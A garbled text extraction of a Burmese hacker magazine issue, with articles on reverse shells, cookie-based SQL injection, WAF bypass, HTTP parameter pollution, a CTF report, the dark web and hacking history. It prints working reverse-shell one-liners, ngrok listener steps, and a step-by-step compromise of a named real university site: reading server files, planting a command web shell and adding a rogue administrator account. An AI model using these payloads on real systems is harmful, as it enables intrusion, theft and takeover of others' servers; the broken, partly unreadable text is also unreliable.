Important Announcement
PubHTML5 Scheduled Server Maintenance on (GMT) Sunday, June 26th, 2:00 am - 8:00 am.
PubHTML5 site will be inoperative during the times indicated!
EN
Home Explore B24565

B24565

Published by kophakan2213, 2020-10-13 07:05:18

Description: B24565

Search

Read the Text Version

50 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Root reverse user mgthura t ။ ။ web sever Command : bash -i >& /dev/tcp/ipaddress/port 0>&1 -m bash ႔ reverse ။ perl script php script ႔။ perl script Link download ။ https://pastebin.com/raw/EcKH5Ah4 Script source from pentestmonkey Perl extension ႔ ၐ ။ Power By Union Of Underground Myanmar Hackers

51 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH It script run ။ $$ : perl script.pl Pt attacker revrse ။ Reversing with python 2.7 Console t ႔။ Power By Union Of Underground Myanmar Hackers

52 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Script source : pentest monkey python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ipa ddress\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' In attacker machine , python ႔reverse ႔။ Reversing with php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse- shell.php Script Ip and port ။ php script Run Power By Union Of Underground Myanmar Hackers

53 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Ct ။ Window reverse t႔ ။Window ။ For Window Script Source: Dhayalanb https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse Shell.php ip and port ။ host.com/yourreverseshell.php Execute Window reverse ။ Using ngrok to listen port Power By Union Of Underground Myanmar Hackers

54 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH port forward ။ port listen ႔ ႔။ download https://dashboard.ngrok.com/user/login Register os Instruction config ။ ./ngrok tcp port 0.tcp.ngrok.io:port tcp port port t ။ ./ngrok tcp 443 Sudo nc -lnvp 443 ႔ t ။Reverse 0.tcp.ngrok.io:port listen 443 ။႔ port forward ။ ႔။ ။ revrse Thanks for reading, Thura Moe Myint Power By Union Of Underground Myanmar Hackers

55 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH COOKIE BASED INJECTION Kyaw Phyo Zaw Tutorial Injection 412 Error Cookies Manager bypass ။ Tt site.com/detail.php?sid=1 ။V single t‗ ။ Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource error ။ www.site.com/details.php?sid=1' order by 10— -Q order by 412 Error :3 URL Encode Method ႔ bypass ။ 412 Error ။ URL ။ Encode Method ႔ bypass ႔ www.site.com/details.php?sid=1%27%20order%20by%2010--%20- www.site.com/details.php?sid=1'%0border%0bby%0b10-- www.site.com/details.php?sid=1'/**/order/**/by/**/10-- - Hmm :3 Still Error bypass ႔ ။ Cookie inject bypass ႔ ။ ႔ Cookie Manager Addons https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ ။ Addons ။ Search Inject Edit ။Target id (1) www.site.com/details.php?sid=1 Name parameter (sid)၊ Content ။ ။ Domain www.site.com target ႔ Save ။ Power By Union Of Underground Myanmar Hackers

56 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Browser www.site.com/details.php ၐ Cookie Manager save ႔ refresh ။ single quote query fixed columns order by ႔ ။ order by 9 error vuln columns ။ Columns 3,4,5 ႔ ႔ 4 version() ။ B GO :D t dump ႔ ။ t DIOS Query WAF again :3 Power By Union Of Underground Myanmar Hackers

57 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH DIOS Query bypass ။ export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns +where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!5 0000table_name*/,2)),@,2) Got it ! D t dump ႔ ။t :P Cookie ။Target Manager ႔ Live HTTP Headers refresh www.site.com/detail.php?sid=1 Live HTTP Headers Target Site parameter Replay C : PHPSESSID= 665 t 4 288 0t5 t 7 (;) (sid) ႔ inject ႔။ Power By Union Of Underground Myanmar Hackers

58 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 403 F bypass ။ WAF routed query injection ႔ WAF bypass POST parameter bypass ႔ ။ trick ႔ ။။ bypass T FR ……… Kyaw Phyo Zaw Power By Union Of Underground Myanmar Hackers

59 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH WS ၐ Load_File ႔ d_file ႔ ႔ ၊T t ႔ ၊Loa ႔ Tt ။( ( .. :P ) ႔ ။:D ) ။ ႔ column count ၊ inject ၊႔ ၊ WAF(Web Application Firewall) Bypass ႔ crack ၊ Data ႔ ၊P H Facebook …႔ Admin Panel ႔( ၐ ႔ ႔)။ ။ A t website ႔ ။ …. SQL V ႔ website ႔- tt :// tt / ?t = 0 ။ SQL V ။ ႔ inject admin user & password ႔ t Dt (၁) ႔႔ (၁) ႔ ႔ ႔ Power By Union Of Underground Myanmar Hackers

60 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔။ ။( ၊ )။ ႔ ႔႔ ႔။ ႔ ႔ load_file ။ Load_File ႔ ႔ ၐF ႔။ Load_File LS ၐ /etc/passwd ၊ /etc/hosts ၊ Windows Server ။ ႔? !! SQLi Vulnerable Test SQL Error Message ႔ ႔ File Document Directory ၐ႔ ႔ ။OK… SQL Error Message C:\\xampp\\htdocs\\found.php ..Server Admin ႔ ႔ website t ။… ႔ load_file found.php ႔F read ႔ ၐ႔ - http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file(\"C:\\\\x ampp\\\\htdocs\\\\found.php\"),3,4,5,6,7,8,9,10,11--+ Power By Union Of Underground Myanmar Hackers

61 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Hmm.. ႔ browser php code ႔ၐ ၊႔ ႔ ႔ ႔ load_file ႔ view source ႔ ။ found.php ႔ ႔။ G t ! It‘ ၊ ႔။ ။႔ ႔ ႔ ။load_file ႔ ၐ read ႔ ႔ ၊write ႔ ႔ ႔ ႔- Power By Union Of Underground Myanmar Hackers

62 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat( user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user--+ root:Y,root:Y,:N,pma:N,super:Y ၊ ႔ ..။ root & super ႔ ႔ ႔ File_Priv ။ ႔ ႔ user name ႔ ။ ၊႔ ႔ filter ႔ ႔။ ႔႔ ႔ super http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat( user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user where user=0x7375706572--+ ႔႔ super ႔ ( super ႔ hash )။ ႔ file_priv ႔ value 0 7375706572 ။။ ႔ into outfile ႔ ၐ command ႔- http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,\"<? system($_GET['cmd']); ?>\",3,4,5,6,7,8,9,10,11+into+outfile+'C:\\xampp\\htdocs\\cmd.php'--+ Power By Union Of Underground Myanmar Hackers

63 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH GET Method server ၊ Error into outfile ႔႔ Error ။႔ ။Website ႔ Error Message SQLi Vulnerable Test ႔ Error Message ႔ ၊ ၊ (P.S => File Privilege ‘t t )။Browser ႔ .. ႔ ႔ File S ၐ http://library.northsouth.edu/cmd.php OOP!! Page Not Found …႔ ႔ File load_file ။ Directory ။Out ၊ Document_ File ႔ ႔ 'C:\\xampp\\htdocs\\cmd.php' ??? Directory ႔ ႔႔ ႔ File Power By Union Of Underground Myanmar Hackers

64 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ၊Directory ႔ 'C:\\\\xampp\\\\htdocs\\\\cmd.php' ႔ File ႔- http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,\"<? system($_GET['cmd']); ?>\",3,4,5,6,7,8,9,10,11+into+outfile+'C:\\\\xampp\\\\htdocs\\\\cmd.php'-- + A S EM ? ၊ Browser ႔ cmd.php ႔F ႔- Bingo!!! ႔ File S ၐ ။ ႔ File ႔ ၊ backslash ႔။ ႔႔ ႔ ႔ ႔ ၊ ။ Programming ႔ \\n ၊ \\t ႔ ႔႔ ႔ ၊႔ \\n = >next line ႔ \\t=> a tab or 6 spaces ႔ ။႔ double backslash ( ႔ ) double front slash ႔ ။ Directory Path ႔ Server ။ ။ (P.S=> ႔S single quote ၊ double quote ၐ Power By Union Of Underground Myanmar Hackers

65 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။) ။ ႔ ။ ႔ eval code ႔႔ ႔- http://library.northsouth.edu/cmd.php?cmd=dir ႔ ၊ File uploader ၊ Shell ႔။ ။႔ ႔ wget & curl linux server ။ )။ wget /curl put ႔ - ။ :P ။ ႔၊OMO ႔ ။( ၊ tt :// tt / ?= ― code !‖ > t t Server ႔- ႔ ႔ upload file ၐ uploader.txt ႔ ႔ echo function ႔ ။ http://library.northsouth.edu/cmd.php?cmd=move uploader.txt uploader.php move command uploader.txt uploader.php ႔ ။ ႔ ႔၊ ႔ ။ Attacker ၐ ႔ backdoor wget (or) curl remote file download/upload ႔ ႔ ၊ file create ႔ ႔ ႔႔ ႔။ ႔ ႔ ႔။ ။ ႔ load_file ႔ F read ႔ Server ႔ ႔ PMA(PhpMyAdmin) password file access ၊ - website ႔ database configuration file read phpMyAdmin Panel ။ ႔ ၐ႔ ႔ Power By Union Of Underground Myanmar Hackers

66 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ ႔ pma ႔ passwords.txt File read ႔။ ႔႔ ။Server ႔ ႔ Security ႔ ႔႔ H hacked ႔ ။႔႔ ႔ dir command file & directory list ၐ႔ website file ႔ i.php ။ ႔ i.php ႔၊ ႔႔ ႔ ႔ ႔- http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file(\"C:\\\\x ampp\\\\htdocs\\\\i.php\"),3,4,5,6,7,8,9,10,11--+ ႔။ ။ view source ။ ၊႔ obfuscated ။ Power By Union Of Underground Myanmar Hackers

67 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ႔D damn Hacker shell hash ၐၐ file password ။ ႔ crack password ။ (P.S=> password crack ႔ ႔ t ။) ႔ ႔ shell upload ။ Power By Union Of Underground Myanmar Hackers

68 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Server W S 2003 Security ႔႔ Anti-Virus ႔ ။ ႔ shell ႔ (P.S=> Anti-Virus D t t ႔။ ႔ load_file ႔ ႔၊ ၐ ႔ ။ ၐ )။ t I !? account administrator ႔။ ၊It‘ ႔ Server Deface ႔၊ ႔ ႔ ( Permission ႔ ) – net user YOURUSER YOURPASS /add YOURUSER ႔ ႔ ႔ user name ၊ YOURPASS ႔ ႔ user name ႔ password ႔ /add ႔ command ႔ Server ၐ ။ ႔ account ႔ user user ႔ ႔ tt - net localgroup Administrator YOURUSER /add user level Administrator Level ႔ ႔/ user administrator level access ႔ - net user youruser Power By Union Of Underground Myanmar Hackers

69 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Administrator Level ႔ Remote Desktop Protocol(RDP) ႔ ႔ ။႔ ၎ ။RDP ၊ ႔ ႔ password Hash ။) ။( ႔ Zer0flag(Myanmar Security Forum) Power By Union Of Underground Myanmar Hackers

70 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Http-Parameter-Pollution Introduction HTTP Parameter Pollution Attack MSF ( Myanmar Security Form ) Post ။ Magazine SQL Injection CSRF Att WAF ( Web Application Firewall ) ။ HPP WAF Bypass ။ ။ HPP Attack ၊ HPP F t Bypass ၊ Example ။ W t‘ HPP Htt P t P t Att ? HPP Attack 2009 OWASP Conference di Paola ႔ Carettoni ႔ Injection Class ။ HPP Attack ။ Attacker HTTP t t ၍ Web Appli -cation ၊Input Validation B Exploitable Varia -bles Http Parameter Pollution Att HPP ၐ ။ HPP WAF B ႔ ။ HPP Attack 2009 ႔ ၊႔ ။ HPP Attack SQL Injection ႔ CSRF Bypass ။ Parameter Precedence in Web Applications WA t D t sanitize Http Parameter (e.g:GET/POST/Cookie) ႔ Attacker Pt ။ Web Application t႔ ႔။ ႔ Web Application U It ။ Power By Union Of Underground Myanmar Hackers

71 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Table ။ ႔ Website ႔ Http Protocol ႔R t t ႔ Website ႔ Server ႔ ။R Dt ႔? Htt R t Htt P t ၐ Transfer ႔ GET/POST Request Table ႔- ႔ Input ႔ ႔ Htt GET POST R t ႔ ။ GET /index.asp?param1=value1& param2=value2 HTTP/1.1 Host: www.myanmarmiss.com User-Agent: Safari/535.1 Accept: text/html,application/xhtml+xml POST /index.asp HTTP/1.1 Host: www.myanmarmiss.com User-Agent: Safari/535.1 Accept: text/html,application/xhtml+xml Content-Type: application/x-www-form-urlencoded Content-Length: 27 param1=value1& param2=value2 Technology/HTTP Back-End Overall Parsing Result Example Power By Union Of Underground Myanmar Hackers

72 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ASP.NET/IIS All occurrences of the specfic parameter par1=val1,val2 ASP/IIS All occurrences of the specfic parameter par1=val1,val2 PHP/Apache Last occurrence par1=val2 PHP/Zeus Last occurrence par1=val2 JSP,Servlet/Apache Tomcat First occurrence par1=val1 Table Web Technology U I tP t ၊ ။ ။ Parameter Table ႔ Http Parameter Pollution(HPP) Attack Web Server ။ ႔ (=) , (&) HTTP R t ႔ ႔ t႔ ႔ ။ - GET / index.php? A = 1 & a = 2 & a = 3,4 & a= 5 & a = 6 HTTP/1.1 User-Agent:Modzilla/5.0 Host: Host Accept:*/* POST / index.php? A = 1 & a = 2 HTTP/1.1 User-Agent:Modzilla/5.0 Host: Host Power By Union Of Underground Myanmar Hackers

73 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Accept:*/* Cookie: a = 3, a = 4 Content-type: text / plain Content-Length: 7 Connection: close a=5&a=6 ႔ Client Side User Http Request (GET/POST) ႔ ။ User ႔ Htt R t Server R ။ ၊ ။ ႔ Web Application A /PHP ႔ Server ႔ ႔ req t Server ။ ႔W T Handle ‗‘ ႔ ‗3‘ t ။ ႔ ႔ Web Server IIS / ASP NET ႔ ၎ ႔ Handle ‗‘ ႔ 1,2,3,4,5,6 ႔ Request Data ။ IIS/ASP.NET parameter ႔ ႔ separate rep ။- http://www.yourwebsite.com/index.php?page=profile.php&id=1&username=zer0flag&userna me=$n1ff3rg0d username ႔ URI ‗=‘ ႔ ‗ ‘ zer0flag ၊$n1ff3rg0d ႔ ႔ IIS/ASP N t PHP/Apache ႔ zer0flag ST $n1ff3rg0d Web Application $n1ff3rg0d ႔ profile ။ ။ Handle ႔။ ႔ ႔ .. ႔ T ႔ ။ ၊ ႔ User ႔ ႔ ႔ ‗‘ ‗=‘ ႔ ‗ ‘ ႔t ႔ ႔ WA t ၊ .. ။႔ SQL Injection Attack ။ ႔ SQL Injection WAF ႔ ႔ Bypass ႔ ၊ SQL Injection Power By Union Of Underground Myanmar Hackers

74 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Parameter Pollution SQL injection Bypass ႔ ၊ ႔… Parameter Pollution B - ။႔ IIS/ASP.NET ႔ SQL Injection ႔ ႔ website Bypass http://www.target.com/index.aspx?id=-1+UNION+SELECT+username, password + FROM + users- ႔ It ႔ query ။ query IIS Server ႔ block ႔ ။ IIS ႔ Firewall ႔ ModSecurity query request ႔ ( GET/ Request.QueryString [* id *] id ႔ ႔ ႔႔ ။ ModSecurity ႔ block POST/Cookie ႔) ‗/ … /‘ ႔ t split ႔႔ http://www.target.com/index.aspx?id=- 1/*&id=*/UNION/*&id=*/SELECT/*&id=*/username&id=password/*&id=*/FROM/*&id=*/us ers– ႔ Http Parameter Pollution t split ။ IIS/ASP.NET Server inject ။ ႔ http://www.target.com/index.aspx?id=-1 / *, * / UNION / *, * / SELECT / *, * / username, password / *, * / FROM / *, * / users – .. ႔ ModSecurity Bypass ႔ ။ IIS/ ASP.NET SQL Injection Bypass ႔ Web ႔ WA t At ၐ HPP ႔ ။ ႔ JSP ႔ ႔။ Url : http://missmyanmar.com/missmsf.jsp?poll_id=1111 Link1: < =\" t ? =1111 =N K ‖> Vote for Nang Khin Zayar </a> L 2: < =\" t ? =1111 =K W t W ‖> Vote for Khin Wint Wah </a> Power By Union Of Underground Myanmar Hackers

75 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ၊ Myanmar ႔ ႔ ႔ miss ။ ႔ miss Myanmar ႔ vote ။ poll_id Web Developer sanitize ႔ ႔V ႔။ Attacker ႔P t ႔ link t။ http://missmyanmar.com/missmsf.jsp?poll_id=1111%26miss%3DKhin Wint Wah Attacker V ႔ poll_id ႔ link ။ <a href=vote.jsp?pool_id=1111&miss=Khin Wint Wah&miss=Nang Khin Zayar> Vote for Nang Khin Zayar </a> <a href=vote.jsp?pool_id=1111&miss=Khin Wint Wah&miss=Khin Wint Wah> Vote for Khin Wint Wah </a> Miss Myanmar vote ႔ Attacker ႔ Link ႔ Att ႔။ ႔V t Nang Khin ။ Zayar vote ႔ Khin Wint Wah Vote B Cross Site Request Fogrey (CSRF) Attack ။ … ႔ Http Parameter Pollution Attack ။ ႔ ႔ ႔ HPP Attack ။႔ ။ Written By zer0flag(Myanmar Security Forum) Power By Union Of Underground Myanmar Hackers

76 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

77 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

78 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH CTF Experience Lover ႔ ႔ Asia Cyber Sea Games In Thailand ( Nov 22 ) Exper ။A t Myanmar, Indonesia, Thailand, Philippines, Malaysia, Singapore, Vietnam, Cambodia, Laos, Brunei ၁ ။ Asia 10 10 ။ Registration time ၈ ။ ၊ 10 ။ ၊t t၊ laptop t ။ wifi internet ၊ network cable ctf challenge server access ႔။ ႔Team IP address 4 ။ physical machine ip address ။ Virtual Box Bridge Adapter ip address ။ ip address t t ႔ ။ network monitoring ip address 4 ႔ ။ network setting ။ challenge 5 ။ category Reversing 50/300 ၊ Network ( agent44 ) ၊ Memory forensics 100 ၊ crypto ႔ ။ ( ။ ) reversing R ။re-50 analysis ။ file download ။ file signature zip flie ႔ file extract ။ jrafile ။file extension ၐ signature data ။ exiftool mp3 t audacity raw_import method import F ။ ၊ speed slowest ၊ ၐ႔ ။ re 300 ႔ ။ challenge password ႔ password flag format submit ။challenge file IDA analysis user input linux environment ( \"Passwd\" ) ။ 5 hardcore md5 ႔ compare ။ hardcore md5 google ၊ kali rockyou.txt ။ ( flag format prefix ) password ။ ။ Power By Union Of Underground Myanmar Hackers

79 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Memory Forensics Challenge tt ။ pdf file password ႔ ႔ pdfcrack ႔ brute ။ ILoveDifferent.bmp ႔ ။LSB LSB python ႔ ။ ။png file key md5 IV ႔။ Agent44 Network public key & Priv key SSL Decrypt ။E t M ၐ ႔ http ။flag ။ first round ။12:00 1:00 ။ ႔ ႔ ။ ႔ score ။t ။ ။ Second round ႔ 1:00 ။ t- 30 ) Second round ။ Re-300 hash john the ripper c႔ rack ။R -100/150/200 IDA ႔ analysis flag ။ john run ႔ john stop ။ challeng easy_pwn ႔ malware timestamp ။ Cryoto challenge ႔ ။challenge logic flag custom encryption ။ encoded text ။ challenge flag ႔ custom encryption method ႔ ။encryption method bitwise operator and ('&') python (႔ ။ Network Forensics Challenge ။Challenge logic web server sql injection attack ။ attacker real ip ။ real ip flag format (Eg. CS2017{11.22.44.55} ) submit ။ Attacker Real Ip L H t IP ႔။ @@@‘-- ႔ ႔ submit ။ incorrect ။ 3:00PM CT ။C ။ ႔ ။ MF ႔ score board ၊ hint ႔ C Graph ႔ ။ Team ႔ ။ ၊၊ ႔ ႔ first score ၂ ႔ flag submit ႔။ ႔ Japapn Secon Guest ႔ Air Ticket ။ Facebook ႔ CTF experience ႔ ၊ InfoSec Field Power By Union Of Underground Myanmar Hackers

80 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ Local Information Security ႔ international Myanmar ႔\" \" ႔။ Noted * ) first round tt close ။ ။ status C hint ႔ ။ ) * ) sore board local Team ။ Team ။ ( japan * ) experience ႔ ။ *) Thanks You. ။ ( ။ t ႔ ။) Philippines team ႔ ႔ ။Philippines ။ :P Lover Power By Union Of Underground Myanmar Hackers

81 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH RED ROOM Dr.t3rr0r ( AnonCoders Team ) Dark Web Dark Web ႔ ႔ Surface Web/ Clearnet ႔ ။ ႔ Dark Web Surface Web ႔ ။ Surface Web Google ၊ Yahoo ၊ Bings ႔ SE ႔ Web Technology ။ Surface Web .com, .org, .net ႔ .info ႔ ႔ t ၊E t ႔ t႔ ႔။ Dark Web Deep Web WB ။Dark Web TOR ႔ I2P Anonymous ႔ ႔ ၐ ။ ၊ ႔ ၊ Cyber Crime TOR ႔ I2P ။ Internet Governance ႔ Cyber ။ ။ Deep Web Deep Web Dark Web ႔။ Deep Web ၐ ၐ၊Undernet Deepnet ႔ ၊Invisible Web ( ) Hidden Web ႔ ။ Surface Web Data Communication ၊ Wt ႔ၐ ႔ Trace ႔ ။ Deep Web ႔႔ Google Search Engine S t Dark Web ႔ Web ႔ Total Internet 0.1% ။ Deep Web ႔႔ ။ Power By Union Of Underground Myanmar Hackers

82 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH RED ROOM ၊ ၊The Red Room ႔ ။ Dark Web Dark Web ႔ Deep Web ႔ ။ Red Room ဏ Red Room RR ၊ ။ ၊ ႔ Bitcoin Live Stream Videos ။ ၊ Deep Web ႔ ။ ။၊ ၊P ၊ Anonymous ။ ႔ 2014 April Operation Israel Anonymous Arab ႔ …။ 2014 #OpIsrael ႔႔ ။ ႔ L St Email ႔ Bt A ။ Bitcoin ဏ ႔႔ ဏ ။ Master ႔ ႔ 0.70 BTC ႔ ။ BTC ႔ PGP Encryption Encryption Method Email Keys ႔ ႔။ Surface Web Protonmail ႔M Dark Web ႔ ။ Corpse Husband Horrifying Deep Web Stories \"W I Q t H ‖ Videos ။Red Room ႔ Cuture ႔ ၁၉၇၆ Snuff ႔ ၁၉၈ Cannibal Holocaust ႔။ G Vt ႔ ။ Dark Web H ။ Technical St Dark Web ။ Dark Web S t Dt ။ Trace ႔ ႔ Financial Theft ။ Botnet Repository ။ B Mt ႔ Power By Union Of Underground Myanmar Hackers

83 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၐ ။ Ct C ။ Dark Web ႔ ႔ ။Dark Web ဏ I2P ႔ ၊ TOR network ။ ။ The Dark Web ။ D tM t ၊ Dark Web Anonymity ISP and Security ။T B ႔ Connection ၐ Law Enforcement ႔ ႔ ။ Tor 128-bit AES Encryption Standard ႔ ႔ Internet ၊ VPN Connection Tor Configure Tor ။ VPN ။ The Dark Web ႔ Firefox ႔ Chromium ႔ ။The Dark Web ႔ ႔ Tor Browser ။ Firefox ႔ Chromium ႔ Power By Union Of Underground Myanmar Hackers

84 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Dark Web D tM t ။D tM t ။ AlphaBay Feds ၂ ၁၇ ၊ ။ AlphaBay ႔ http://pwoah7foa6au2pul.onion/ G ။ ။ Silk Road 3 ။။ Tt ။ Awareness ႔ ႔ ။Tor Tor Browser Windows Size ႔။ JavaScript Browser ။ ႔ .onion Beef run ႔ ။ ႔။ W ။M - ။Blackmail ႔ ။ File Shredding ႔။ Recover FDE ႔ ။Dark Web P t E t 0day Forum ႔။ 1 Cent PM Casino ႔။ ။ Dr.t3rr0r(AnonCoders) Power By Union Of Underground Myanmar Hackers

85 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH HISTORY OF HACKING Dr.t3rr0r(AnonCoders) Hacking ။ Hacking ။ ။ \" ။ \" Facebook ၐ Anonymous computer ။ Hacking ၒ ႔။ ။ ၊ ၁၈၇၆ Hacking ၁၈၇၈ ။ ( ႔ ) ။၁၈၇၈ ႔ St ။ Power By Union Of Underground Myanmar Hackers

86 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။႔ ႔ Hacking ႔ Michael Devitt ႔ ။ Hacker ။ ၁၉၅ ႔ ။ ၁၉၆ ႔ ႔ Mainframe Computer ဏ၊ ႔ၑ t ။M C ။ ႔ ႔ ။ Kevin Mitnick ႔ ၐ Hacker Kevin Poulsen ႔ ။ PHREAKERS: Phreakers ၐ ။ Wikipedia Phreaking “P hreaking is a slang term coined to describe the activity of a culture of people who study, experiment with, or explore telecommunication systems, such as equipment and systems tt t t‖ ႔။ ႔ ႔ ၊ ၐ ႔။ Phreaking A C ၊ A T ၊ PBX ႔S t ။ Shoulder ႔ ။ ။ ။ Burte Force Surfing R ၐ ။P ။ Facebook ႔ W -D Attack ႔ ႔ ။ War-Dial ႔ ၐ။ ၁၉၇၅ Homebrew Computer Club of California Draper ႔ ၐ blue boxes ႔ ၐ ၐ ။ Draper ႔ ။ t Company Steve Wozniak ႔ Steve Jobs ႔ Apple ။ Power By Union Of Underground Myanmar Hackers

87 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ၁၉၈ AT&T Phone Phreaking ႔ T F ANI ႔ ၐ Automatic Number Identification A႔ tt Trace ႔ T ။ Att T ႔ ။P ။ Tools Description Red ၐ ႔t ။ Box Black ။ Box Cheese P P PP Box ။ Agua T ။ Box Blast M Box ။ Blotto ၐ။ Box Blue 2600-H T ။ Box Bud ။ Box Color ။ Box Copper Cr T Att D ။ Box Infinity R t At t ။ Box Mauve T။ Box Power By Union Of Underground Myanmar Hackers

88 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Diverter ၐ ။ Hackers ၁၉၇၁ ၊ Hacking John Draper ဏ ။ Captain Crunch 2600-hertz audio tone ၐဏ ႔ ႔ Temper ။ ၁၉၉၅ Vladimir Levin Citibank ။ ႔ ။ $240,000 ဏ ၐ ၃.၇ ႔ Citibank ။ Citibank ၁ ။ Hacking ႔ ။ Kevin Mitnick Ct St C t ။ ။ C tC ။ Kevin Mitnick c0mrade ႔ ။ Defense Threat Redu -ction Agency of U.S. Department of Defense Miami-Dade School System ႔ BellSouth ႔ Backdoor U ,P ႔ Email Account ။ ။ U.S. Missile Command ။။ ။ Dr.t3rr0r(AnonCoders) ========================================================= Power By Union Of Underground Myanmar Hackers

89 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Fire sale Cyber attack Fire sale Cyber attack ။ hacker ႔ ။ ၄ ။ ။ everything must go ။ Fire sale ။ ၃ ၂။ Information Warfare ၂ ။၂ ဏ ႔။ ၍႔ ၍ ။Cyber Space ႔။ ၄၍ ။ Fire Sale ႔ ၐ ။ Live Free or Die Hard ။ ႔ ႔။ - ႔ (Disrupting Transpotation)၊ (Stealing and Destroying Financial)၊ (Disabling of Public Utilities) ၍ (Creating Fear with Media) ႔ ။ ။ Disrupting Transpotation ႔ ။ ။ ၐ။ ၊ ႔၍ ၒ႔ ၐ ၊ ၐ ။ ၐ ႔၊ ၊ ႔ ဏ ၒ ၐ ႔ ။ ၒ ။ ၐ Power By Union Of Underground Myanmar Hackers

90 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Stealing and Destroying Financial ဏ ၊ ။ e-Commerce ၐ (ElectoricCommerce ) ။ Electoric ၍၊ ၊ ၊၊ ၊ /႔ ။ ၍၊ ၊႔ ။ ၊ ဏ၊ ။ ဏၐ ၐ ႔၍ ၊ဏ ၊ ၐ ၊ဏ ၊ ႔ ႔ ၊ / ။ ႔ ႔ ၁၆.၇၅ ။ LB ၐ ။ ႔ ၐ။ ၐ V ႔ D႔ isabling of Public Utilities ၍ ။ ။ ႔၊ ၊ ႔ ႔႔ ဏ ။႔ ။ ။ ၐ ႔ ၊ၐ ႔ ၐ ။ St t V ။ Creating Fear with Media ၊ ၊ ။ ၊ ။ Power By Union Of Underground Myanmar Hackers

91 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH - ။ ၊ ၍ ၐ ၊ ၊ ႔႔ ၐ ၊႔ ၊ ၊ ႔ ။ ။ ႔ ။ ။။ t ( ) ႔ ။ UGMH G4 MHU Power By Union Of Underground Myanmar Hackers

92 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH SOCIAL ENGINEERING ၁။ Network Adminstrator ႔ ႔ Dt ႔ Security Software System ။႔ Network - ( ) Firewall System (Hardware/ Software) ( ) Biometric system device ( ) IDS/IPS system (ဃ) Event logging system ( ) Antivirus system ။ ၂။ Security System Monitoring System ၍ ၊ Hacker ။ ႔ Network Condition Data Network ႔ Network L S Dt t ။ Net-work ။ Network Social Engineering ႔ ၏ User Psychology ၍ Network ၊ ။၊ ႔ Network Reception phone Social Engineering ၍ ၊။ ၃။ Social Engineering ၊ ႔၏ ၊ ႔၊ ၊ ႔၍ ။ ၄။ Social Engineering ၏ Attacker ၐ၍ ။ ။ ႔ Net -work data ႔ ။ Power By Union Of Underground Myanmar Hackers

